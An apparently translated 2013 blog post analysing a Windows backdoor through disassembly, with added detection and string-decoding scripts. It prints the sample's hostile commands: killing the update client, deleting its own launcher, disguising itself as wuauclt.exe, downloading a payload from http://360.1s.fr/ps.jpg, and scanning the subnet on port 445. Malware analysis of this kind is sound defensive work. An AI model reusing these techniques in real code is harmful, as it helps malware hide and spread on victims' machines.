Analysis of a Backdoor
This post was last edited by JoyChou on 2013-9-25 17:32.
Author: JoyChou
Date: 24 September 2013, 23:37:23
Blog: http://www.cnblogs.com/Joy7/
Virus name: Backdoor/Win32.Wuca.bj
Virus type: backdoor
File MD5: 2A1AEF106795864CA9DB643A116807DC
File size: 9,728 bytes
Affected systems: Windows 98 and later
Packer: UPX 0.89.6 - 1.02 / 1.05 - 1.24
Compiler: Microsoft Visual C++ 6.0
Execution flow (I was too lazy to draw a diagram):
When the sample runs it first checks whether its own process is present; if it is, execution continues, otherwise it exits (it makes no attempt to hide the process, so after a double-click it is of course present). The sample then elevates its own privileges and checks whether the path of the current process is "C:\WINDOWS\Fonts\wuauclt.exe".
If it is not: it creates a directory named sa.exe under C:\Windows and sets that directory's attributes to hidden and read-only; runs the command cmd /c taskkill /im wuauclt.exe /f to terminate wuauclt.exe (wuauclt.exe is the Windows Automatic Updates client, which keeps checking online for updates; killing it stops the machine from receiving update information), which prepares the later masquerade; copies the running sample to C:\WINDOWS\Fonts\wuauclt.exe and sets it hidden (disguised as the Automatic Updates client); runs cmd /c del "C:\Documents and Settings\Administrator\桌面\1.exe" to delete the file it was launched from, for stealth; and exits. Done.
If it is (the file C:\WINDOWS\Fonts\wuauclt.exe cannot be found by browsing at this point; locate it with file search and debug it with OD): it loads the system library "urlmon.dll", calls its "URLDownloadToFileA" function, connects to http://360.1s.fr/ps.jpg, downloads the payload and saves it as C:\WINDOWS\Fonts\gern.fon. It then checks whether that file exists; if not, it shows a message box and exits; if it does, it creates several threads. Because the download fails, much of the functionality in those threads cannot run. The main functions are creating an autostart entry, running a remote-overflow tool, and running an svchost.exe file.
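Added example, not code from the original post: detection logic for the three behaviours just described (wuauclt.exe running outside System32, taskkill of the update client, and cmd /c del of the launching file), run over constructed process-creation records. The record format and the sample records are assumptions made here to imitate EDR/Sysmon process-creation events.

```python
# Added example, not part of the original analysis: detection logic for the
# behaviour described above, run over constructed process-creation records.
# The record format (image | command line | parent image) and the sample
# records are constructed here to imitate EDR/Sysmon process-creation events.
import ntpath
from typing import Dict, List

# ASSUMPTION: on a clean host the Automatic Updates client lives in System32.
GENUINE_WUAUCLT_DIR = r"c:\windows\system32"

# Constructed records following the first run (kill, copy, self-delete) and the
# second run of the sample (now masquerading as wuauclt.exe); the last is benign.
SAMPLE_EVENTS = [
    r"C:\WINDOWS\system32\cmd.exe|cmd /c taskkill /im wuauclt.exe /f"
    r"|C:\Documents and Settings\Administrator\桌面\1.exe",
    r'C:\WINDOWS\system32\cmd.exe|cmd /c del "C:\Documents and Settings\Administrator\桌面\1.exe"'
    r"|C:\Documents and Settings\Administrator\桌面\1.exe",
    r"C:\WINDOWS\Fonts\wuauclt.exe|C:\WINDOWS\Fonts\wuauclt.exe|C:\WINDOWS\explorer.exe",
    r"C:\WINDOWS\system32\wuauclt.exe|C:\WINDOWS\system32\wuauclt.exe|C:\WINDOWS\system32\svchost.exe",
]

def parse_event(line: str) -> Dict[str, str]:
    """Split one constructed record into its three fields."""
    image, cmdline, parent = line.split("|", 2)
    return {"image": image, "cmdline": cmdline, "parent": parent}

def _norm(path: str) -> str:
    """Case-insensitive, normalised Windows path for comparisons."""
    return ntpath.normpath(path).lower()

def check_event(ev: Dict[str, str]) -> List[str]:
    """Return one finding per rule that matches this record."""
    hits = []
    image, parent = _norm(ev["image"]), _norm(ev["parent"])
    cmdline = ev["cmdline"]
    cl_low = cmdline.lower()
    # Rule 1: a process named wuauclt.exe started from anywhere but System32
    # (the sample drops itself as %WINDIR%\Fonts\wuauclt.exe).
    if ntpath.basename(image) == "wuauclt.exe" and ntpath.dirname(image) != GENUINE_WUAUCLT_DIR:
        hits.append("wuauclt.exe masquerade: " + ev["image"])
    # Rule 2: the Automatic Updates client being killed from a command line.
    if "taskkill" in cl_low and "wuauclt.exe" in cl_low:
        hits.append("taskkill of wuauclt.exe by " + ev["parent"])
    # Rule 3: cmd /c del whose target is the parent's own executable
    # (the sample deletes the file it was launched from).
    if cl_low.startswith("cmd /c del "):
        target = cmdline[len("cmd /c del "):].strip().strip('"')
        if _norm(target) == parent:
            hits.append("self-deletion of " + ev["parent"])
    return hits

def triage(lines: List[str]) -> List[str]:
    """Run every rule over every record and collect the findings in order."""
    findings: List[str] = []
    for line in lines:
        findings.extend(check_event(parse_event(line)))
    return findings

if __name__ == "__main__":
    for finding in triage(SAMPLE_EVENTS):
        print(finding)
```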
Detailed analysis: the UPX layer has no VMP on top, so it was unpacked directly with an unpacker.
Some of the code:
00402130 >/$55 push ebp
00402131|.8BEC mov ebp,esp
00402133|.81EC AC030000 sub esp,0x3AC
00402139|.53 push ebx
0040213A|.56 push esi
0040213B|.57 push edi
0040213C|.E8 3FF8FFFF call wuauclt.00401980 ;enumerate processes
00402141|.85C0 test eax,eax
00402143|.74 08 je Xwuauclt.0040214D
00402145|.6A 00 push 0x0 ; /ExitCode = 0
00402147|.FF15 60304000 call dword ptr ds:[<&KERNEL32.ExitProces>; \ExitProcess
0040214D|>E8 7EF4FFFF call wuauclt.004015D0 ;elevate privileges
00402152|.8D85 54FCFFFF lea eax,
00402158|.68 04010000 push 0x104 ; /BufSize = 104 (260.)
0040215D|.50 push eax ; |PathBuffer
0040215E|.6A 00 push 0x0 ; |hModule = NULL
00402160|.FF15 5C304000 call dword ptr ds:[<&KERNEL32.GetModuleF>; \GetModuleFileNameA
00402166|.8D8D 5CFEFFFF lea ecx,
0040216C|.68 04010000 push 0x104 ; /BufSize = 104 (260.)
00402171|.51 push ecx ; |Buffer
00402172|.FF15 7C304000 call dword ptr ds:[<&KERNEL32.GetWindows>; \GetWindowsDirectoryA
00402178|.BF 047D4000 mov edi,wuauclt.00407D04 ;ASCII "\Fonts\wuauclt.exe"
0040217D|.83C9 FF or ecx,0xFFFFFFFF
00402180|.33C0 xor eax,eax
00402182|.8D95 5CFEFFFF lea edx, ;edx:C:\windows
00402188|.F2:AE repne scas byte ptr es:
0040218A|.F7D1 not ecx ;length of "\Fonts\wuauclt.exe" = 0x13
0040218C|.2BF9 sub edi,ecx
0040218E|.68 687F4000 push wuauclt.00407F68 ;ASCII "ont"
00402193|.8BF7 mov esi,edi
00402195|.8BD9 mov ebx,ecx
00402197|.8BFA mov edi,edx
00402199|.83C9 FF or ecx,0xFFFFFFFF
0040219C|.F2:AE repne scas byte ptr es:
0040219E|.8BCB mov ecx,ebx
004021A0|.4F dec edi
004021A1|.C1E9 02 shr ecx,0x2
004021A4|.F3:A5 rep movs dword ptr es:,dword ptr ds>
004021A6|.8BCB mov ecx,ebx
004021A8|.8D85 54FCFFFF lea eax,
004021AE|.83E1 03 and ecx,0x3
004021B1|.50 push eax
004021B2|.F3:A4 rep movs byte ptr es:,byte ptr ds:[>
004021B4|.E8 27030000 call wuauclt.004024E0
004021B9|.83C4 08 add esp,0x8
004021BC|.85C0 test eax,eax
004021BE|.0F84 DA010000 je wuauclt.0040239E
004021C4|.33C9 xor ecx,ecx
004021C6|.8D55 EC lea edx,
004021C9|.894D ED mov dword ptr ss:,ecx
004021CC|.52 push edx
004021CD|.894D F1 mov dword ptr ss:,ecx
004021D0|.68 B87D4000 push wuauclt.00407DB8 ;ASCII "khbced$Zbb"
004021D5|.894D F5 mov dword ptr ss:,ecx
004021D8|.C645 EC 00 mov byte ptr ss:,0x0
004021DC|.894D F9 mov dword ptr ss:,ecx
004021DF|.66:894D FD mov word ptr ss:,cx
004021E3|.884D FF mov byte ptr ss:,cl
004021E6|.E8 25F1FFFF call wuauclt.00401310 ;string decryption
004021EB|.83C4 08 add esp,0x8
004021EE - 00402215 90 nop ;40 consecutive nop instructions (padding), listed once here
00402216|.8D45 EC lea eax,
00402219|.50 push eax ; /FileName
0040221A|.FF15 38304000 call dword ptr ds:[<&KERNEL32.LoadLibrar>; \LoadLibraryA
00402220|.8BD8 mov ebx,eax
00402222|.B9 09000000 mov ecx,0x9
00402227|.33C0 xor eax,eax
00402229|.8D7D C5 lea edi,dword ptr ss:
0040222C|.C645 C4 00 mov byte ptr ss:,0x0
00402230|.C685 60FFFFFF>mov byte ptr ss:,0x0
00402237|.F3:AB rep stos dword ptr es:
00402239|.66:AB stos word ptr es:
0040223B|.AA stos byte ptr es:
0040223C|.B9 18000000 mov ecx,0x18
00402241|.33C0 xor eax,eax
00402243|.8DBD 61FFFFFF lea edi,dword ptr ss:
00402249|.F3:AB rep stos dword ptr es:
0040224B|.66:AB stos word ptr es:
0040224D|.8D4D C4 lea ecx,
00402250|.51 push ecx
00402251|.68 A47D4000 push wuauclt.00407DA4 ;ASCII "KHB:emdbeWZJe<_b[7"
00402256|.AA stos byte ptr es:
00402257|.E8 B4F0FFFF call wuauclt.00401310
0040225C|.83C4 08 add esp,0x8
0040225F|.8D55 C4 lea edx,
00402262|.52 push edx ; /URLDownloadToFileA
00402263|.53 push ebx ; |urlmon.dll
00402264|.FF15 34304000 call dword ptr ds:[<&KERNEL32.GetProcAdd>; \GetProcAddress
0040226A|.A3 D88C4000 mov dword ptr ds:,eax
0040226F|.8D85 58FDFFFF lea eax,
00402275|.68 04010000 push 0x104 ; /BufSize = 104 (260.)
0040227A|.50 push eax ; |Buffer
0040227B|.FF15 7C304000 call dword ptr ds:[<&KERNEL32.GetWindows>; \GetWindowsDirectoryA
00402281|.BF D47C4000 mov edi,wuauclt.00407CD4 ;ASCII "\Fonts\gern.fon"
00402286|.83C9 FF or ecx,0xFFFFFFFF
00402289|.33C0 xor eax,eax
0040228B|.8D95 58FDFFFF lea edx,
00402291|.F2:AE repne scas byte ptr es:
00402293|.F7D1 not ecx
00402295|.2BF9 sub edi,ecx
00402297|.8BF7 mov esi,edi
00402299|.8BFA mov edi,edx
0040229B|.8BD1 mov edx,ecx
0040229D|.83C9 FF or ecx,0xFFFFFFFF
004022A0|.F2:AE repne scas byte ptr es:
004022A2|.8BCA mov ecx,edx
004022A4|.4F dec edi
004022A5|.C1E9 02 shr ecx,0x2
004022A8|.F3:A5 rep movs dword ptr es:,dword ptr ds>
004022AA|.8BCA mov ecx,edx
004022AC|.8D85 60FFFFFF lea eax,
004022B2|.83E1 03 and ecx,0x3
004022B5|.50 push eax
004022B6|.F3:A4 rep movs byte ptr es:,byte ptr ds:[>
004022B8|.68 507F4000 push wuauclt.00407F50 ;ASCII "^jjf0%%),&$'i$\h%fi$`f]"
004022BD|.E8 4EF0FFFF call wuauclt.00401310 ;http://360.1s.fr/ps.jpg
004022C2|.83C4 08 add esp,0x8
004022C5|.8D8D 58FDFFFF lea ecx,
004022CB|.8D95 60FFFFFF lea edx,
004022D1|.6A 00 push 0x0
004022D3|.6A 00 push 0x0
004022D5|.51 push ecx ;C:\WINDOWS\Fonts\gern.fon
004022D6|.52 push edx ;http://360.1s.fr/ps.jpg
004022D7|.6A 00 push 0x0
004022D9|.FF15 D88C4000 call dword ptr ds:
004022DF 68 10270000 push 0x2710
004022E4|.FF15 88304000 call dword ptr ds:[<&KERNEL32.Sleep>] ; \Sleep
004022EA|.53 push ebx ; /hLibModule
004022EB|.FF15 30304000 call dword ptr ds:[<&KERNEL32.FreeLibrar>; \FreeLibrary
004022F1|.8D85 58FDFFFF lea eax,
004022F7|.50 push eax ; /FileName
004022F8|.FF15 2C304000 call dword ptr ds:[<&KERNEL32.GetFileAtt>; \GetFileAttributesA
004022FE|.83F8 FF cmp eax,-0x1
00402301|.6A 00 push 0x0 ; /Style = MB_OK|MB_APPLMODAL
00402303|.75 1E jnz Xwuauclt.00402323 ; |
00402305|.68 487F4000 push wuauclt.00407F48 ; |Title = "http"
0040230A|.68 3C7F4000 push wuauclt.00407F3C ; |Text = "qq935623508"
0040230F 6A FF push -0x1
00402311|.FF15 B0304000 call dword ptr ds:[<&USER32.MessageBoxA>>; \MessageBoxA
00402317|.5F pop edi
00402318|.5E pop esi
00402319|.B8 01000000 mov eax,0x1
0040231E|.5B pop ebx
0040231F|.8BE5 mov esp,ebp
00402321|.5D pop ebp
00402322|.C3 retn
00402323|>8B35 58304000 mov esi,dword ptr ds:[<&KERNEL32.CreateT>; |kernel32.CreateThread
00402329|.6A 00 push 0x0 ; |CreationFlags = 0
0040232B|.6A 00 push 0x0 ; |pThreadParm = NULL
0040232D|.68 801F4000 push wuauclt.00401F80 ; |ThreadFunction = wuauclt.00401F80
00402332|.6A 00 push 0x0 ; |StackSize = 0
00402334|.6A 00 push 0x0 ; |pSecurity = NULL
00402336|.FFD6 call esi ; \CreateThread
00402338|.6A 00 push 0x0 ; /pThreadId = NULL
0040233A|.6A 00 push 0x0 ; |CreationFlags = 0
0040233C|.6A 00 push 0x0 ; |pThreadParm = NULL
0040233E|.68 301C4000 push wuauclt.00401C30 ; |ThreadFunction = wuauclt.00401C30
00402343|.6A 00 push 0x0 ; |StackSize = 0
00402345|.6A 00 push 0x0 ; |pSecurity = NULL
00402347|.FFD6 call esi ; \CreateThread
00402349|.6A 00 push 0x0 ; /pThreadId = NULL
0040234B|.6A 00 push 0x0 ; |CreationFlags = 0
0040234D|.6A 00 push 0x0 ; |pThreadParm = NULL
0040234F|.68 F0194000 push wuauclt.004019F0 ; |ThreadFunction = wuauclt.004019F0
00402354|.6A 00 push 0x0 ; |StackSize = 0
00402356|.6A 00 push 0x0 ; |pSecurity = NULL
00402358|.FFD6 call esi ; \CreateThread
0040235A|.6A 00 push 0x0 ; /pThreadId = NULL
0040235C|.6A 00 push 0x0 ; |CreationFlags = 0
0040235E|.6A 00 push 0x0 ; |pThreadParm = NULL
00402360|.68 40164000 push wuauclt.00401640 ; |ThreadFunction = wuauclt.00401640
00402365|.6A 00 push 0x0 ; |StackSize = 0
00402367|.6A 00 push 0x0 ; |pSecurity = NULL
00402369|.FFD6 call esi ; \CreateThread
0040236B|.6A 00 push 0x0 ; /pThreadId = NULL
0040236D|.6A 00 push 0x0 ; |CreationFlags = 0
0040236F|.6A 00 push 0x0 ; |pThreadParm = NULL
00402371|.68 50174000 push wuauclt.00401750 ; |ThreadFunction = wuauclt.00401750
00402376|.6A 00 push 0x0 ; |StackSize = 0
00402378|.6A 00 push 0x0 ; |pSecurity = NULL
0040237A|.FFD6 call esi ; \CreateThread
0040237C|.6A 00 push 0x0 ; /pThreadId = NULL
0040237E|.6A 00 push 0x0 ; |CreationFlags = 0
00402380|.6A 00 push 0x0 ; |pThreadParm = NULL
00402382|.68 701D4000 push wuauclt.00401D70 ; |ThreadFunction = wuauclt.00401D70
00402387|.6A 00 push 0x0 ; |StackSize = 0
00402389|.6A 00 push 0x0 ; |pSecurity = NULL
0040238B|.FFD6 call esi ; \CreateThread
0040238D|.E8 CEF2FFFF call wuauclt.00401660 ;set autostart entry
00402392|.5F pop edi
00402393|.5E pop esi
00402394|.B8 01000000 mov eax,0x1
00402399|.5B pop ebx
0040239A|.8BE5 mov esp,ebp
0040239C|.5D pop ebp
0040239D|.C3 retn
0040239E|>68 307F4000 push wuauclt.00407F30 ;ASCII "C:\sa.exe"
004023A3|.E8 4E020000 call wuauclt.004025F6 ;create directory
004023A8|.8B35 88304000 mov esi,dword ptr ds:[<&KERNEL32.Sleep>] ;kernel32.Sleep
004023AE|.83C4 04 add esp,0x4
004023B1|.6A 64 push 0x64 ; /Timeout = 100. ms
004023B3|.FFD6 call esi ; \Sleep
004023B5|.6A 03 push 0x3 ; /FileAttributes = READONLY|HIDDEN
004023B7|.68 307F4000 push wuauclt.00407F30 ; |FileName = "C:\sa.exe"
004023BC|.FF15 9C304000 call dword ptr ds:[<&KERNEL32.SetFileAtt>; \SetFileAttributesA
004023C2|.8B1D 28304000 mov ebx,dword ptr ds:[<&KERNEL32.WinExec>;kernel32.WinExec
004023C8|.6A 00 push 0x0 ; /ShowState = SW_HIDE
004023CA|.68 0C7F4000 push wuauclt.00407F0C ; |CmdLine = "cmd /c taskkill /im wuauclt.exe /f"
004023CF|.FFD3 call ebx ; \WinExec
004023D1|.68 D0070000 push 0x7D0 ; /Timeout = 2000. ms
004023D6|.FFD6 call esi ; \Sleep
004023D8|.8D8D 5CFEFFFF lea ecx,
004023DE|.6A 00 push 0x0 ; /FailIfExists = FALSE
004023E0|.8D95 54FCFFFF lea edx, ; |
004023E6|.51 push ecx ; |NewFileName
004023E7|.52 push edx ; |ExistingFileName
004023E8|.FF15 50304000 call dword ptr ds:[<&KERNEL32.CopyFileA>>; \CopyFileA
004023EE|.68 A00F0000 push 0xFA0 ; /Timeout = 4000. ms
004023F3|.FFD6 call esi ; \Sleep
004023F5|.8D85 5CFEFFFF lea eax,
004023FB|.6A 00 push 0x0 ; /ShowState = SW_HIDE
004023FD|.50 push eax ; |CmdLine
004023FE|.FFD3 call ebx ; \WinExec
00402400|.B9 18000000 mov ecx,0x18
00402405|.33C0 xor eax,eax
00402407|.8DBD 61FFFFFF lea edi,dword ptr ss:
0040240D|.C685 60FFFFFF>mov byte ptr ss:,0x0
00402414|.F3:AB rep stos dword ptr es:
00402416|.66:AB stos word ptr es:
00402418|.AA stos byte ptr es:
00402419|.BF 007F4000 mov edi,wuauclt.00407F00 ;ASCII "cmd /c del "
0040241E|.83C9 FF or ecx,0xFFFFFFFF
00402421|.33C0 xor eax,eax
00402423|.8D95 60FFFFFF lea edx,
00402429|.F2:AE repne scas byte ptr es:
0040242B|.F7D1 not ecx
0040242D|.2BF9 sub edi,ecx
0040242F|.8BC1 mov eax,ecx
00402431|.8BF7 mov esi,edi
00402433|.8BFA mov edi,edx
00402435|.C1E9 02 shr ecx,0x2
00402438|.F3:A5 rep movs dword ptr es:,dword ptr ds>
0040243A|.8BC8 mov ecx,eax
0040243C|.83E1 03 and ecx,0x3
0040243F|.F3:A4 rep movs byte ptr es:,byte ptr ds:[>
00402441|.FF15 4C304000 call dword ptr ds:[<&KERNEL32.GetCommand>; [GetCommandLineA
00402447|.8BF8 mov edi,eax
00402449|.83C9 FF or ecx,0xFFFFFFFF
0040244C|.33C0 xor eax,eax
0040244E|.8D95 60FFFFFF lea edx,
00402454|.F2:AE repne scas byte ptr es:
00402456|.F7D1 not ecx
00402458|.2BF9 sub edi,ecx
0040245A|.50 push eax ; /ShowState => SW_HIDE
0040245B|.8BF7 mov esi,edi ; |
0040245D|.8BFA mov edi,edx ; |
0040245F|.8BD1 mov edx,ecx ; |
00402461|.83C9 FF or ecx,0xFFFFFFFF ; |
00402464|.F2:AE repne scas byte ptr es: ; |
00402466|.8BCA mov ecx,edx ; |
00402468|.4F dec edi ; |
00402469|.C1E9 02 shr ecx,0x2 ; |
0040246C|.F3:A5 rep movs dword ptr es:,dword ptr ds>; |
0040246E|.8BCA mov ecx,edx ; |
00402470|.8D85 60FFFFFF lea eax, ; |
00402476|.83E1 03 and ecx,0x3 ; |
00402479|.50 push eax ; |CmdLine
0040247A|.F3:A4 rep movs byte ptr es:,byte ptr ds:[>; |
0040247C|.FFD3 call ebx ; \WinExec
0040247E|.6A 00 push 0x0 ; /ExitCode = 0
00402480\.FF15 60304000 call dword ptr ds:[<&KERNEL32.ExitProces>; \ExitProcess
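Added example, not code from the original post: the three obfuscated strings the listing passes to the routine at 00401310 (at 004021D0, 00402251 and 004022B8) all decode under one rule, every byte plus 10, which is inferred here from the ciphertext/plaintext pairs visible in the listing comments; the routine itself was not examined, so the rule is an assumption that fits those three strings.

```python
# Added example (not code from the original post): recovers the plaintext of the
# obfuscated strings that the listing passes to the routine at 00401310.
# ASSUMPTION: the routine itself was not examined here; the "+10 per byte" rule
# is inferred from the three ciphertext/plaintext pairs visible in the listing.
from typing import Dict, Optional

# Ciphertexts copied from the listing, keyed by the address each is pushed from.
ENCODED_STRINGS = {
    0x00407DB8: "khbced$Zbb",               # passed to LoadLibraryA
    0x00407DA4: "KHB:emdbeWZJe<_b[7",       # passed to GetProcAddress
    0x00407F50: "^jjf0%%),&$'i$\\h%fi$`f]",  # passed to URLDownloadToFileA
}

def find_shift(cipher: str, plain: str) -> Optional[int]:
    """Return the one byte offset k (0..255) with (c + k) & 0xFF == p for every
    character pair, or None if no constant shift explains the pair."""
    if not cipher or len(cipher) != len(plain):
        return None
    k = (ord(plain[0]) - ord(cipher[0])) & 0xFF
    for c, p in zip(cipher, plain):
        if (ord(c) + k) & 0xFF != ord(p):
            return None
    return k

def decode_string(cipher: str, shift: int = 10) -> str:
    """Apply the inferred transform: every byte is incremented by `shift` (mod 256)."""
    return "".join(chr((ord(c) + shift) & 0xFF) for c in cipher)

def decode_all(shift: int = 10) -> Dict[int, str]:
    """Decode every string in the table with the same shift."""
    return {addr: decode_string(s, shift) for addr, s in ENCODED_STRINGS.items()}

if __name__ == "__main__":
    # Derive the shift from the pair the analysis names (the urlmon.dll string),
    # then check that the same shift decodes the other two strings.
    k = find_shift(ENCODED_STRINGS[0x00407DB8], "urlmon.dll")
    for addr, text in decode_all(k).items():
        print(f"{addr:08X}: {text}")
```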
00401D70 is an important thread callback function.
It obtains the host name and then resolves it to the host's IP address.
00401D7E|.8D85 FCFAFFFF lea eax,
00401D84|.50 push eax ; /pWSAData
00401D85|.6A 02 push 0x2 ; |RequestedVersion = 2 (2.0.)
00401D87|.E8 34070000 call <jmp.&WS2_32.#115> ; \WSAStartup
00401D8C|.85C0 test eax,eax
00401D8E|.0F85 DA010000 jnz wuauclt.00401F6E
00401D94|.53 push ebx
00401D95|.56 push esi
00401D96|.57 push edi
00401D97|.8D8D 94FEFFFF lea ecx,
00401D9D|.68 FF000000 push 0xFF ; /BufSize = FF (255.)
00401DA2|.51 push ecx ; |Buffer
00401DA3|.E8 30070000 call <jmp.&WS2_32.#57> ; \gethostname
00401DA8|.85C0 test eax,eax
00401DAA|.0F85 AB010000 jnz wuauclt.00401F5B
00401DB0|.8D95 94FEFFFF lea edx,
00401DB6|.52 push edx ; /Name
00401DB7|.E8 16070000 call <jmp.&WS2_32.#52> ; \gethostbyname
00401DBC|.85C0 test eax,eax
00401DBE|.8945 F8 mov ,eax
Equivalent code:
#include "StdAfx.h"     // MSVC precompiled header used by the original project
#include <stdio.h>
#include <winsock2.h>   // must come before windows.h, otherwise the old winsock.h conflicts with it
#include <windows.h>
#pragma comment(lib, "WS2_32.lib") // must come after the headers, otherwise the link fails
int main(void)
{
    WORD wVersionRequested; // requested Winsock version
    WSADATA wsaData;
    int err;
    wVersionRequested = MAKEWORD(2, 2); // Winsock 2.2
    // load the socket library; return on failure
    err = WSAStartup(wVersionRequested, &wsaData); // the socket library must be loaded first
    if (err != 0)
    {
        return 1;
    }
    // check that the high and low bytes are both 2; exit if this is not version 2.2
    if (LOBYTE(wsaData.wVersion) != 2 ||
        HIBYTE(wsaData.wVersion) != 2)
    {
        WSACleanup();
        return 1;
    }
    char hostname[256] = {0}; // buffer size assumed; the sample passes 0xFF to gethostname
    if (gethostname(hostname, sizeof(hostname)) != 0) // get the host name
    {
        WSACleanup();
        return 1;
    }
    printf("%s\n", hostname);
    PHOSTENT hostinfo;
    char *ip = NULL;
    if ((hostinfo = gethostbyname(hostname)) != NULL) // look up host information by name
    {
        int nCount = 0;
        while (hostinfo->h_addr_list[nCount] != NULL) // walk the NULL-terminated address list
        {
            ip = inet_ntoa(*(struct in_addr *)hostinfo->h_addr_list[nCount]);
            printf("IP #%d: %s\n", ++nCount, ip);
        }
    }
    WSACleanup();
    getchar(); // keep the console window open
    return 0;
}
192.168.160 is the first 24 bits of my machine's IP, so looping 256 times naturally reaches my own address (though why not just use the full 32-bit IP? T_T~).
It initialises a socket and, acting as a client, connects in turn to 192.168.160.0 (incrementing the last octet each time, 256 iterations).
If the connection does not succeed it runs the backdoor program explorer.exe; from this we can tell that the backdoor is a server-side program.
00401EB1|.C745 FC 00000>mov ,0x0
00401EB8|>8B45 F8 /mov eax,
00401EBB|.8B48 0C |mov ecx,dword ptr ds:
00401EBE|.8B11 |mov edx,dword ptr ds:
00401EC0|.8A4D FC |mov cl,byte ptr ss:
00401EC3|.884A 03 |mov byte ptr ds:,cl
00401EC6|.8B50 0C |mov edx,dword ptr ds:
00401EC9|.8B02 |mov eax,dword ptr ds:
00401ECB|.8B08 |mov ecx,dword ptr ds:
00401ECD|.51 |push ecx ; /in_addr
00401ECE|.E8 F9050000 |call <jmp.&WS2_32.#12> ; \inet_ntoa
00401ED3|.8BD8 |mov ebx,eax
00401ED5|.53 |push ebx
00401ED6|.E8 C5FCFFFF |call wuauclt.00401BA0 ;initialise a socket and connect as a client to 192.168.160.0 in turn (last octet incremented, 256 iterations)
00401EDB|.83C4 04 |add esp,0x4
00401EDE|.84C0 |test al,al
00401EE0|.74 67 |je Xwuauclt.00401F49 ; jumps if the connection succeeded
00401EE2|.BF 547E4000 |mov edi,wuauclt.00407E54
00401EE7|.83C9 FF |or ecx,0xFFFFFFFF
00401EEA|.33C0 |xor eax,eax
00401EEC|.F2:AE |repne scas byte ptr es:
00401EEE|.F7D1 |not ecx
00401EF0|.2BF9 |sub edi,ecx
00401EF2|.50 |push eax ; /IsShown => 0
00401EF3|.8BF7 |mov esi,edi ; |
00401EF5|.8BD1 |mov edx,ecx ; |
00401EF7|.8BFB |mov edi,ebx ; |
00401EF9|.83C9 FF |or ecx,0xFFFFFFFF ; |
00401EFC|.F2:AE |repne scas byte ptr es: ; |
00401EFE|.8BCA |mov ecx,edx ; |
00401F00|.4F |dec edi ; |
00401F01|.C1E9 02 |shr ecx,0x2 ; |
00401F04|.F3:A5 |rep movs dword ptr es:,dword ptr d>; |
00401F06|.8BCA |mov ecx,edx ; |
00401F08|.50 |push eax ; |DefDir => NULL
00401F09|.83E1 03 |and ecx,0x3 ; |
00401F0C|.53 |push ebx ; |Parameters
00401F0D|.F3:A4 |rep movs byte ptr es:,byte ptr ds:>; |
00401F0F|.8D7D 94 |lea edi, ; |
00401F12|.83C9 FF |or ecx,0xFFFFFFFF ; |
00401F15|.F2:AE |repne scas byte ptr es: ; |
00401F17|.F7D1 |not ecx ; |
00401F19|.2BF9 |sub edi,ecx ; |
00401F1B|.8BF7 |mov esi,edi ; |
00401F1D|.8BD1 |mov edx,ecx ; |
00401F1F|.8BFB |mov edi,ebx ; |
00401F21|.83C9 FF |or ecx,0xFFFFFFFF ; |
00401F24|.F2:AE |repne scas byte ptr es: ; |
00401F26|.8BCA |mov ecx,edx ; |
00401F28|.4F |dec edi ; |
00401F29|.C1E9 02 |shr ecx,0x2 ; |
00401F2C|.F3:A5 |rep movs dword ptr es:,dword ptr d>; |
00401F2E|.8BCA |mov ecx,edx ; |
00401F30|.8D85 90FDFFFF |lea eax, ; |
00401F36|.83E1 03 |and ecx,0x3 ; |
00401F39|.50 |push eax ; |FileName
00401F3A|.68 C47D4000 |push wuauclt.00407DC4 ; |Operation = "open"
00401F3F|.6A 00 |push 0x0 ; |hWnd = NULL
00401F41|.F3:A4 |rep movs byte ptr es:,byte ptr ds:>; |
00401F43|.FF15 A8304000 |call dword ptr ds:[<&SHELL32.ShellExecu>; \ShellExecuteA // runs the backdoor
00401F49|>8B45 FC |mov eax,
00401F4C|.40 |inc eax
00401F4D|.3D 00010000 |cmp eax,0x100 ;loop count 16*16 = 256, i.e. 0 to 255
00401F52|.8945 FC |mov ,eax
00401F55|.^ 0F8C 5DFFFFFF \jl wuauclt.00401EB8
00401F5B|>E8 66050000 call <jmp.&WS2_32.#116> ; [WSACleanup
Socket initialisation: the call at 00401ED6 to 00401BA0
00401BA0/$81EC A0010000 sub esp,0x1A0
00401BA6|.8D4424 10 lea eax,dword ptr ss:
00401BAA|.56 push esi
00401BAB|.50 push eax ; /pWSAData
00401BAC|.68 01010000 push 0x101 ; |RequestedVersion = 101 (1.1.)
00401BB1|.E8 0A090000 call <jmp.&WS2_32.#115> ; \WSAStartup
00401BB6|.85C0 test eax,eax
00401BB8|.74 0A je Xwuauclt.00401BC4
00401BBA|.32C0 xor al,al
00401BBC|.5E pop esi
00401BBD|.81C4 A0010000 add esp,0x1A0
00401BC3|.C3 retn
00401BC4|>6A 06 push 0x6 ; /Protocol = IPPROTO_TCP
00401BC6|.6A 01 push 0x1 ; |Type = SOCK_STREAM
00401BC8|.6A 02 push 0x2 ; |Family = AF_INET
00401BCA|.E8 EB080000 call <jmp.&WS2_32.#23> ; \socket
00401BCF|.8BF0 mov esi,eax
00401BD1|.83FE FF cmp esi,-0x1
00401BD4|.75 10 jnz Xwuauclt.00401BE6
00401BD6|.50 push eax ; /Socket
00401BD7|.E8 D8080000 call <jmp.&WS2_32.#3> ; \closesocket
00401BDC|.32C0 xor al,al
00401BDE|.5E pop esi
00401BDF|.81C4 A0010000 add esp,0x1A0
00401BE5|.C3 retn
00401BE6|>8B8C24 A80100>mov ecx,dword ptr ss:
00401BED|.66:C74424 04 >mov word ptr ss:,0x2
00401BF4|.51 push ecx ; /pAddr
00401BF5|.E8 B4080000 call <jmp.&WS2_32.#11> ; \inet_addr
00401BFA|.68 BD010000 push 0x1BD ; /NetShort = 1BD
00401BFF|.894424 0C mov dword ptr ss:,eax ; |
00401C03|.E8 A0080000 call <jmp.&WS2_32.#9> ; \ntohs
00401C08|.8D5424 04 lea edx,dword ptr ss:
00401C0C|.6A 10 push 0x10 ; /AddrLen = 10 (16.)
00401C0E|.52 push edx ; |pSockAddr
00401C0F|.56 push esi ; |Socket
00401C10|.66:894424 12mov word ptr ss:,ax ; |
00401C15|.E8 88080000 call <jmp.&WS2_32.#4> ; \connect
00401C1A|.85C0 test eax,eax ;connect returns 0 on success
00401C1C|.0F94C0 sete al ;al is 0 on success
00401C1F|.5E pop esi
00401C20|.81C4 A0010000 add esp,0x1A0
00401C26\.C3 retn
A brief summary: the file C:\WINDOWS\Fonts\gern.fon is really an XX.INI file whose contents are read with GetPrivateProfileStringA; it holds various download URLs as well as various strings used for comparisons. explorer.exe is the backdoor program. The remote overflow is a fairly old exploit.
